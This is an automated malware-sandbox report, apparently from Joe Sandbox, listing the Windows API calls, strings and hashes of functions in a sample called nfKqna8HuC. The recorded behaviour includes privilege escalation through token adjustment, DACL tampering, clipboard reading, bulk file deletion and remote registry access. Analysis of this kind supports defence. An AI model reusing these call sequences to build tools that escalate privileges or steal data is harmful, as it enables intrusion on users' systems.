                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 4125248594-2988720461
                                                                    • Opcode ID: 3c219c91b6a1c312e6891bca0e866f3e060172f7e25366550b4a110a8d983217
                                                                    • Instruction ID: 0b17f23e219b7f259cecb7390ebc989e28592b401ecd3bc521fbf29d3d5c6dcf
                                                                    • Opcode Fuzzy Hash: 3c219c91b6a1c312e6891bca0e866f3e060172f7e25366550b4a110a8d983217
                                                                    • Instruction Fuzzy Hash: 3B31A971A403287BEF306F658C49FBF7E6EEB45B50F104015FA05EA6D0D6B16D01AEA0
                                                                    APIs
                                                                      • Part of subcall function 0065B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0065B180
                                                                      • Part of subcall function 0065B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0065B1AD
                                                                      • Part of subcall function 0065B134: GetLastError.KERNEL32 ref: 0065B1BA
                                                                    • _memset.LIBCMT ref: 0065AD08
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0065AD5A
                                                                    • CloseHandle.KERNEL32(?), ref: 0065AD6B
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0065AD82
                                                                    • GetProcessWindowStation.USER32 ref: 0065AD9B
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 0065ADA5
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0065ADBF
                                                                      • Part of subcall function 0065AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0065ACC0), ref: 0065AB99
                                                                      • Part of subcall function 0065AB84: CloseHandle.KERNEL32(?,?,0065ACC0), ref: 0065ABAB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                    • String ID: $H*m$default$winsta0
                                                                    • API String ID: 2063423040-848939072
                                                                    • Opcode ID: 0f9012715e16bb67805a9c26b96a13910a402d6693309811a4d00d34dc450a28
                                                                    • Instruction ID: 47ee46d0f136b62735a8c808eb0e45dddf2c9202384a5a2296eab53bdda7b172
                                                                    • Opcode Fuzzy Hash: 0f9012715e16bb67805a9c26b96a13910a402d6693309811a4d00d34dc450a28
                                                                    • Instruction Fuzzy Hash: D081ADB1800209AFDF119FE4DC45AEEBBBAFF09305F044219FD15A6261D7319E49DB62
                                                                    APIs
                                                                      • Part of subcall function 00666EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00665FA6,?), ref: 00666ED8
                                                                      • Part of subcall function 00666EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00665FA6,?), ref: 00666EF1
                                                                      • Part of subcall function 0066725E: __wsplitpath.LIBCMT ref: 0066727B
                                                                      • Part of subcall function 0066725E: __wsplitpath.LIBCMT ref: 0066728E
                                                                      • Part of subcall function 006672CB: GetFileAttributesW.KERNEL32(?,00666019), ref: 006672CC
                                                                    • _wcscat.LIBCMT ref: 00666149
                                                                    • _wcscat.LIBCMT ref: 00666167
                                                                    • __wsplitpath.LIBCMT ref: 0066618E
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 006661A4
                                                                    • _wcscpy.LIBCMT ref: 00666209
                                                                    • _wcscat.LIBCMT ref: 0066621C
                                                                    • _wcscat.LIBCMT ref: 0066622F
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0066625D
                                                                    • DeleteFileW.KERNEL32(?), ref: 0066626E
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00666289
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00666298
                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 006662AD
                                                                    • DeleteFileW.KERNEL32(?), ref: 006662BE
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006662E1
                                                                    • FindClose.KERNEL32(00000000), ref: 006662FD
                                                                    • FindClose.KERNEL32(00000000), ref: 0066630B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 1917200108-1173974218
                                                                    • Opcode ID: 9f384f1c8335081c0a7e95c6b026b734f254b3b03e7dd492b1a54febd53e4a6b
                                                                    • Instruction ID: 6b92704d8e8d59379f2eab640e4b6c624c37e679ac92d6c53bd88551250da90a
                                                                    • Opcode Fuzzy Hash: 9f384f1c8335081c0a7e95c6b026b734f254b3b03e7dd492b1a54febd53e4a6b
                                                                    • Instruction Fuzzy Hash: B551017290811CAACB21EB95DC55DDBB7BEAF05300F0501EAF545E2141DE36AB89CFA8
                                                                    APIs
                                                                    • OpenClipboard.USER32(006BDC00), ref: 00676B36
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00676B44
                                                                    • GetClipboardData.USER32(0000000D), ref: 00676B4C
                                                                    • CloseClipboard.USER32 ref: 00676B58
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00676B74
                                                                    • CloseClipboard.USER32 ref: 00676B7E
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00676B93
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00676BA0
                                                                    • GetClipboardData.USER32(00000001), ref: 00676BA8
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00676BB5
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00676BE9
                                                                    • CloseClipboard.USER32 ref: 00676CF6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                    • String ID:
                                                                    • API String ID: 3222323430-0
                                                                    • Opcode ID: 8dc59a3881aa3fe2c5fa8b79bb8747b325bf7c927ce014ff8f1ad6b566c4e925
                                                                    • Instruction ID: cdd22000a46f8f7569e8eb081f3eade0260b2b403f4fc936f03598831ae5155e
                                                                    • Opcode Fuzzy Hash: 8dc59a3881aa3fe2c5fa8b79bb8747b325bf7c927ce014ff8f1ad6b566c4e925
                                                                    • Instruction Fuzzy Hash: A251BF31244601ABD301BF60DD46FAE77AAAF85B11F00902DF68AD62E1DF70E905CF66
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0066F62B
                                                                    • FindClose.KERNEL32(00000000), ref: 0066F67F
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066F6A4
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066F6BB
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0066F6E2
                                                                    • __swprintf.LIBCMT ref: 0066F72E
                                                                    • __swprintf.LIBCMT ref: 0066F767
                                                                    • __swprintf.LIBCMT ref: 0066F7BB
                                                                      • Part of subcall function 0064172B: __woutput_l.LIBCMT ref: 00641784
                                                                    • __swprintf.LIBCMT ref: 0066F809
                                                                    • __swprintf.LIBCMT ref: 0066F858
                                                                    • __swprintf.LIBCMT ref: 0066F8A7
                                                                    • __swprintf.LIBCMT ref: 0066F8F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 835046349-2428617273
                                                                    • Opcode ID: ec81fd8aa6655a98f066f62fb13cf672102ddbea32881688e7ee18a88896282b
                                                                    • Instruction ID: fda37c8db11b0e5bf26fdbe4dbdcbf79bb2b722e9c235b5a5441a72573d443d1
                                                                    • Opcode Fuzzy Hash: ec81fd8aa6655a98f066f62fb13cf672102ddbea32881688e7ee18a88896282b
                                                                    • Instruction Fuzzy Hash: 4AA13FB2408754ABC350EBA4D895DAFB7EDAF98300F400C2EF585C7191EB34DA49CB66
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00671B50
                                                                    • _wcscmp.LIBCMT ref: 00671B65
                                                                    • _wcscmp.LIBCMT ref: 00671B7C
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00671B8E
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00671BA8
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00671BC0
                                                                    • FindClose.KERNEL32(00000000), ref: 00671BCB
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00671BE7
                                                                    • _wcscmp.LIBCMT ref: 00671C0E
                                                                    • _wcscmp.LIBCMT ref: 00671C25
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00671C37
                                                                    • SetCurrentDirectoryW.KERNEL32(006D39FC), ref: 00671C55
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00671C5F
                                                                    • FindClose.KERNEL32(00000000), ref: 00671C6C
                                                                    • FindClose.KERNEL32(00000000), ref: 00671C7C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1803514871-438819550
                                                                    • Opcode ID: f386b888ee91554df3066a50dc9ed2e18009c79a11b31c9cc870326adac80c01
                                                                    • Instruction ID: 4026fa59238d8eef892569abfdfaa3c79f2eaa2ca2dc51e20717e8de12dc8ed7
                                                                    • Opcode Fuzzy Hash: f386b888ee91554df3066a50dc9ed2e18009c79a11b31c9cc870326adac80c01
                                                                    • Instruction Fuzzy Hash: 0031D6315002196BCF15ABF4DC49ADE77AE9F07310F108157F91AE6290EB74DF858E64
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00671CAB
                                                                    • _wcscmp.LIBCMT ref: 00671CC0
                                                                    • _wcscmp.LIBCMT ref: 00671CD7
                                                                      • Part of subcall function 00666BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00666BEF
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00671D06
                                                                    • FindClose.KERNEL32(00000000), ref: 00671D11
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00671D2D
                                                                    • _wcscmp.LIBCMT ref: 00671D54
                                                                    • _wcscmp.LIBCMT ref: 00671D6B
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00671D7D
                                                                    • SetCurrentDirectoryW.KERNEL32(006D39FC), ref: 00671D9B
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00671DA5
                                                                    • FindClose.KERNEL32(00000000), ref: 00671DB2
                                                                    • FindClose.KERNEL32(00000000), ref: 00671DC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 1824444939-438819550
                                                                    • Opcode ID: 823bdfea183ac57ac335d109dde0cb926e6b4d1534beca68e6fe564470b884c3
                                                                    • Instruction ID: f20f9792acfadcdca29773d16b2f512c9d39e387a968a4eacee2c8b150d86f4d
                                                                    • Opcode Fuzzy Hash: 823bdfea183ac57ac335d109dde0cb926e6b4d1534beca68e6fe564470b884c3
                                                                    • Instruction Fuzzy Hash: 2031F832500619AACF21AFA4DC59ADE77AF9F07320F108557F819AA290DB70DF85CE54
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                    • API String ID: 2102423945-2023335898
                                                                    • Opcode ID: 9d067302b5c7d7c9ae24107ce0258525aedbd8519449b7fee6ed905f85d4a6a1
                                                                    • Instruction ID: 6be0b0ce8425d2358a9c03b1c4eb71bc3b219016e92743ce74794190b0f5aada
                                                                    • Opcode Fuzzy Hash: 9d067302b5c7d7c9ae24107ce0258525aedbd8519449b7fee6ed905f85d4a6a1
                                                                    • Instruction Fuzzy Hash: 2382AE71D04229DBCF24CF98D880AEDB7B6BF44310F2581AAD859AB751E7749D81CF90
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 006709DF
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 006709EF
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006709FB
                                                                    • __wsplitpath.LIBCMT ref: 00670A59
                                                                    • _wcscat.LIBCMT ref: 00670A71
                                                                    • _wcscat.LIBCMT ref: 00670A83
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00670A98
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00670AAC
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00670ADE
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00670AFF
                                                                    • _wcscpy.LIBCMT ref: 00670B0B
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00670B4A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                    • String ID: *.*
                                                                    • API String ID: 3566783562-438819550
                                                                    • Opcode ID: ff826960acfd6c7b48796ce00b5ebf70dec17d718078bffc3e20c9299bca6208
                                                                    • Instruction ID: ac1e2b99f91ae1e3a5216c97284074c427e1bbca786d569d07b53b25829a900e
                                                                    • Opcode Fuzzy Hash: ff826960acfd6c7b48796ce00b5ebf70dec17d718078bffc3e20c9299bca6208
                                                                    • Instruction Fuzzy Hash: 106148B25043059FDB50EF60C84599EB3EAFF89314F04891EFA89C7251DB31EA45CBA6
                                                                    APIs
                                                                      • Part of subcall function 0065ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0065ABD7
                                                                      • Part of subcall function 0065ABBB: GetLastError.KERNEL32(?,0065A69F,?,?,?), ref: 0065ABE1
                                                                      • Part of subcall function 0065ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0065A69F,?,?,?), ref: 0065ABF0
                                                                      • Part of subcall function 0065ABBB: HeapAlloc.KERNEL32(00000000,?,0065A69F,?,?,?), ref: 0065ABF7
                                                                      • Part of subcall function 0065ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0065AC0E
                                                                      • Part of subcall function 0065AC56: GetProcessHeap.KERNEL32(00000008,0065A6B5,00000000,00000000,?,0065A6B5,?), ref: 0065AC62
                                                                      • Part of subcall function 0065AC56: HeapAlloc.KERNEL32(00000000,?,0065A6B5,?), ref: 0065AC69
                                                                      • Part of subcall function 0065AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0065A6B5,?), ref: 0065AC7A
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0065A6D0
                                                                    • _memset.LIBCMT ref: 0065A6E5
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0065A704
                                                                    • GetLengthSid.ADVAPI32(?), ref: 0065A715
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0065A752
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0065A76E
                                                                    • GetLengthSid.ADVAPI32(?), ref: 0065A78B
                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0065A79A
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0065A7A1
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0065A7C2
                                                                    • CopySid.ADVAPI32(00000000), ref: 0065A7C9
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0065A7FA
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0065A820
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0065A834
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                    • String ID:
                                                                    • API String ID: 3996160137-0
                                                                    • Opcode ID: 157e726e4b71b84ac9672d93c18efbf06b464456747cb0647d1363b2314bebdb
                                                                    • Instruction ID: a8dd47ca9f527ee7d4249234fbd322da054448ce1c5f2e4787ffc293a73fb858
                                                                    • Opcode Fuzzy Hash: 157e726e4b71b84ac9672d93c18efbf06b464456747cb0647d1363b2314bebdb
                                                                    • Instruction Fuzzy Hash: 92514C71900209AFDF10DFA5DC44AEEBBBAFF05305F048229F911A7290DB34AA09CF61
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: l$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$lll l
                                                                    • API String ID: 0-908078634
                                                                    • Opcode ID: a8016ce498e1d57ddf49bec7c3b135d57be524ba8ee299c897453bf01c1e40e9
                                                                    • Instruction ID: 23c75ffb557133e79f9d38fbf6f45df3ada96bcd610b0872345e517ac9a78731
                                                                    • Opcode Fuzzy Hash: a8016ce498e1d57ddf49bec7c3b135d57be524ba8ee299c897453bf01c1e40e9
                                                                    • Instruction Fuzzy Hash: A7727F71E0462A8BDB14DF58D890BEEB7B6BF49310F14416AE805EB380DB749E81DF94
                                                                    APIs
                                                                      • Part of subcall function 00666EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00665FA6,?), ref: 00666ED8
                                                                      • Part of subcall function 006672CB: GetFileAttributesW.KERNEL32(?,00666019), ref: 006672CC
                                                                    • _wcscat.LIBCMT ref: 00666441
                                                                    • __wsplitpath.LIBCMT ref: 0066645F
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00666474
                                                                    • _wcscpy.LIBCMT ref: 006664A3
                                                                    • _wcscat.LIBCMT ref: 006664B8
                                                                    • _wcscat.LIBCMT ref: 006664CA
                                                                    • DeleteFileW.KERNEL32(?), ref: 006664DA
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006664EB
                                                                    • FindClose.KERNEL32(00000000), ref: 00666506
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                    • String ID: \*.*
                                                                    • API String ID: 2643075503-1173974218
                                                                    • Opcode ID: 9a90bb0f0cf2e22086fb7f13ea6a90b4157e124a5d6415875b94d3d8d4a0bc63
                                                                    • Instruction ID: b2c8ea56dc2d385374e15ad2cdf2cb15838f75f9dcb389029578262375559ff5
                                                                    • Opcode Fuzzy Hash: 9a90bb0f0cf2e22086fb7f13ea6a90b4157e124a5d6415875b94d3d8d4a0bc63
                                                                    • Instruction Fuzzy Hash: 5C31C5B240C384AAC721EBA4C8859DB77DDAF56304F00492EF6D9C3141EA35E50DC7A7
                                                                    APIs
                                                                      • Part of subcall function 00683C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00682BB5,?,?), ref: 00683C1D
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0068328E
                                                                      • Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
                                                                      • Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0068332D
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006833C5
                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00683604
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00683611
                                                                    Memory Dump Source
